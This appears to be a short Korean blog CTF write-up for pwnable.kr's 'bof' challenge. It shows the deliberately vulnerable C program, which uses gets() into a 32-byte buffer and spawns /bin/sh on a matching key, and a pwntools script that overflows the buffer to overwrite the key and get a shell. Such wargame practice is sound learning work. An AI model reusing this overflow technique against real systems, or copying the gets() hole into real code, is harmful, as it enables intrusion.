본문 바로가기

pwn/pwnable.kr

bof

problem

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

0xdeadbeef인 key를 0xcafebabe로 overwrite하면 된다

 

 

from pwn import *

p = remote("pwnable.kr", 9000)

payload = b"A" * 0x34
payload += p32(0xcafebabe)


p.sendline(payload)


p.interactive()

 

flag

 

'pwn > pwnable.kr' 카테고리의 다른 글

random  (0) 2022.03.23
passcode  (0) 2022.03.23
flag  (0) 2022.03.23
collision  (0) 2022.03.23
fd  (0) 2022.03.23